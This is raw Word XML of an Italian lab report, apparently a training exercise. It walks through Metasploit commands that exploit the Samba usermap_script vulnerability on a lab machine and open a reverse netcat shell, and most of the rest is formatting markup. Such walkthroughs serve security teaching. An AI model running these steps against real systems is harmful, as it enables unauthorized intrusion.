            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1666895891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95891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6485" cy="401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7B60" w14:textId="786EFDA2" w:rsidR="005920B8" w:rsidRDefault="0064321C" w:rsidP="005920B8">
      <w:pPr>
        <w:jc w:val="center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053945" wp14:editId="0516F5C6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>282356</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2858879</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="368102" cy="190621"/>
                <wp:effectExtent l="0" t="19050" r="32385" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="199881061" name="Freccia a destr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102" cy="19062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E4C7A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1" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:22.25pt;margin-top:225.1pt;width:29pt;height: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" adj="16007" fillcolor="#4472c4 [3204]" strokecolor="#09101d [484]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005920B8" w:rsidRPr="00C048FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE092C0" wp14:editId="29C10B4B">
            <wp:extent cx="5577205" cy="4041419"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1734779602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79602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9522" cy="405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1761" w14:textId="77777777" w:rsidR="00574459" w:rsidRDefault="00574459" w:rsidP="005920B8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FB73CE" w14:textId="77777777" w:rsidR="00574459" w:rsidRPr="00322D05" w:rsidRDefault="00574459" w:rsidP="00574459">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Entro dentro MSFConsole con il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, una volta dentro utilizzando </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">show payloads </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>per vedere i vari payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F861C60" w14:textId="77777777" w:rsidR="00574459" w:rsidRDefault="00574459" w:rsidP="005920B8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0424D54D" w14:textId="6382F893" w:rsidR="008C020C" w:rsidRDefault="008C020C" w:rsidP="005920B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0170360A" w14:textId="77777777" w:rsidR="00574459" w:rsidRDefault="00574459" w:rsidP="005920B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6800145A" w14:textId="6619AE8A" w:rsidR="008C020C" w:rsidRDefault="008C020C" w:rsidP="008C020C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C35A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0249C8EA" wp14:editId="63AD783F">
            <wp:extent cx="6120130" cy="4410075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1488767972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67972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3A30" w14:textId="77777777" w:rsidR="0064321C" w:rsidRDefault="0064321C" w:rsidP="008C020C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357E7345" w14:textId="49C7A84E" w:rsidR="00574459" w:rsidRPr="00322D05" w:rsidRDefault="00574459" w:rsidP="006D48CC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Con il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/samba/usermap_script </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ho eseguito un exploit per sfruttare la vulnerabilità del servizio Samba attivo sulla porta TCP 445, </w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in automatico </w:t>
      </w:r>
      <w:r w:rsidR="0064321C" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usa il payload cmd/unix/</w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse/_netcat.</w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Con il comando </w:t>
      </w:r>
      <w:r w:rsidR="007D5783" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r w:rsidR="00395245" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> options </w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">avrei potuto </w:t>
      </w:r>
      <w:r w:rsidR="00774063" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verificare i parametri</w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Dopo aver selezionato il modulo</w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, h</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o configurato l’indirizzo IP dell’host attaccante che ascolterà le connessioni</w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST 192.168.13.100</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, la porta in ascolto </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT 445 </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e infine l’host della macchina bersaglio </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RHOST 192.168.13.150</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Infine, ho eseguito l’</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, avviando così una sessione di shell sul</w:t>
      </w:r>
      <w:r w:rsidR="006D48CC" w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bersaglio, consentendomi di eseguire comandi sulla macchina tipo </w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00322D05">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00574459" w:rsidRPr="00322D05" w:rsidSect="004A031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312"/>
    <w:rsid w:val="000A56EE"/>
    <w:rsid w:val="001A6F33"/>
    <w:rsid w:val="0023566B"/>
    <w:rsid w:val="00295282"/>
    <w:rsid w:val="002E0ED0"/>
    <w:rsid w:val="00322D05"/>
    <w:rsid w:val="003323EB"/>
    <w:rsid w:val="0038751C"/>
    <w:rsid w:val="00395245"/>
    <w:rsid w:val="00412986"/>
    <w:rsid w:val="004A0312"/>
    <w:rsid w:val="00556D75"/>
    <w:rsid w:val="00574459"/>
    <w:rsid w:val="005920B8"/>
    <w:rsid w:val="0064321C"/>
    <w:rsid w:val="006D48CC"/>
    <w:rsid w:val="006D6F09"/>
    <w:rsid w:val="006F0440"/>
    <w:rsid w:val="00774063"/>
    <w:rsid w:val="00786ECB"/>
    <w:rsid w:val="007D5783"/>
    <w:rsid w:val="008C020C"/>
    <w:rsid w:val="009D1578"/>
    <w:rsid w:val="00AC015E"/>
    <w:rsid w:val="00AE5EFC"/>
    <w:rsid w:val="00BC14EA"/>
    <w:rsid w:val="00C51EB1"/>
    <w:rsid w:val="00D5245E"/>
    <w:rsid w:val="00D93573"/>
    <w:rsid w:val="00F43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93A746"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2D6C3523-F61F-423B-8678-3EE5D511C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4A03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basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004A03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llegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004A0312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4A03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192.168.13.150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</TotalTime>
  <Pages>7</Pages>
  <Words>610</Words>
  <Characters>3482</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>29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Giusy In</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Giusy In</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T10:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-28T19:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>